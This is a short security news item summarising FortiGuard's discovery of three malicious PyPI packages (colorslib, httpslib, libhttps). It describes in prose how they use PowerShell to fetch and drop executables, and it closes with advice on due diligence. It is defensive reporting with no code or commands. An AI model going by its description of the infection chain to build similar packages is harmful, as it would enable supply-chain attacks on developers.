Cybercriminals often plant malicious packages on public software repositories to target victims via supply chain attacks. These repositories make good targets as the potential victims would not be as suspicious and they usually don’t expect to get infected. Recently, three malicious Python packages named colorslib, httpslib, and libhttps have been discovered in the PyPI library.
Libraries impacted
FortiGuard researchers discovered the three packages while monitoring an open-source ecosystem and revealed its findings.
- An author named Lolip0p became active on the official PyPI repository on January 7 and published colorslib and httpslib packages on the same day. He published the libhttps package on January 12.
- Further analysis revealed that all three packages are identical and contain the project description that may look legitimate and clean.
- All versions of the package (Colorslib 4.6.11, Colorslib 4.6.12, Httpslib 4.6.9, Httpslib 4.6.11, Httpslib 4.6.12, Libhttps 4.6.12, and others) were found malicious.
Modus operandi
The packages try to run a PowerShell with a suspicious URL that includes malicious binary executable files.
- An executable named Oxyz.exe is downloaded from the URL, which drops another executable, update.exe.
- The second executable runs in a temporary folder and drops a series of files to the temp folder.
- One of the dropped files, SearchProtocolHost.exe, is flagged as malicious by several vendors.
Although the URL was not previously detected by any other threat researchers, some vendors flagged the downloaded executable files as malicious.
Conclusion
Lack of moderation and automated security controls in public software repositories allow anyone to use them as a platform to spread malware. Even inexperienced attackers can launch typosquatting, dependency confusion, or simple social engineering attacks by abusing the repositories. Thus, when downloading and running any packages users should always perform due diligence, especially for packages by new authors.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_514851160.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/iStock_76958877_MEDIUM.jpg)
